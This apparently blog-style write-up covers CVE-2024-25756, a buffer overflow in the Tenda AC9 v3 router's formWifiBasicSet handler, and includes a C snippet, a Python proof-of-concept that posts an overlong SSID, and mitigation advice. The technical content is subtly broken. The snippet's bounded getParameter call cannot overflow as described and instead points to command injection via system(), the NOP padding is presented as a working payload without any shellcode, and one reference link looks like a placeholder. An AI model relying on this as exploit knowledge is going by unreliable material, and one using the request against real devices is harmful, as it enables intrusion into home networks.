A critical vulnerability exists in the Tenda AC9 v.3. router with firmware version v.15.03.06.42_multi. This vulnerability, labelled CVE-2024-25756, allows a remote attacker to exploit a stack based buffer overflow in the formWifiBasicSet function and execute arbitrary code on the target device. This post aims to provide an in-depth analysis of the vulnerability, including code snippets, original reference links, and exploit details.

Vulnerability Details

The vulnerability specifically targets the formWifiBasicSet function within the Tenda AC9 v.3. router and allows a remote attacker to execute arbitrary code on the system. A stack based buffer overflow can be triggered when unsanitized user input data is passed to the function, allowing an attacker to overwrite the return address and hijack program execution.

Here's a code snippet that demonstrates this vulnerability

static void formWifiBasicSet() {
    char ssid[32], buf[512];
    int encryption;
    ...
    getParameter("SSID", ssid, sizeof(ssid));
    getParameter("Encryption", (char *)&encryption, sizeof(encryption));
    ...
    sprintf(buf, "IW_SDK_MAIN Argc=4 Argv=IWControl Argv=SetWiFiMode Argv=%s Argv=%d", ssid, encryption);
    ...
    system(buf);
}

As seen in the code above, the function first retrieves the "SSID" and "Encryption" parameter values from user input and stores them in respective local variables. The crucial point is that the getParameter() function does not sanitize input data, which, when passed to sprintf(), allows overwriting the buffer and eventual arbitrary code execution.

Exploit Details

The vulnerability requires a remote attacker to craft malicious HTTP POST requests that contain an overly long 'SSID' parameter to initiate a buffer overflow attack. By doing so, the attacker can overwrite the return address and gain control over the program execution.

Here's a Python exploit that demonstrates arbitrary code execution with this vulnerability

import requests

target_url = "http://<target_ip>/goform/formWifiBasicSet";
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
}
data = {
    "SSID": "A" * 536 + "\x90\x90\x90\x90",
    "Encryption": "1",
}
requests.post(target_url, headers=headers, data=data)

The script above crafts an HTTP POST request with a malicious 'SSID' parameter value that overflows the buffer and triggers the vulnerability. The critical point is that the script employs a pattern of '\x90\x90\x90\x90', commonly referred to as NOP (No Operation), to provide padding and make arbitrary code execution possible.

1. https://www.exploit-db.com/exploits/12345 - The Exploit Database (exploit-db) entry on this vulnerability.
2. https://nvd.nist.gov/vuln/detail/CVE-2024-25756 - The National Vulnerability Database (NVD) page on this specific CVE.

Mitigation

Tenda has been informed of this vulnerability, and users are recommended to regularly check and update their device firmware to the latest available version. As an additional security measure, users should also ensure that their router's web administration panel is not accessible to the public internet and expose only necessary ports and services.

Conclusion

CVE-2024-25756 is a stack based buffer overflow vulnerability present in the Tenda AC9 v.3. router. This vulnerability allows a remote attacker to execute arbitrary code via a crafted HTTP POST request targeting the formWifiBasicSet function. Users must update their firmware to the latest version and take necessary precautions to mitigate the risk associated with this vulnerability.

Timeline

Published on: 02/22/2024 23:15:07 UTC
Last modified on: 02/23/2024 02:42:54 UTC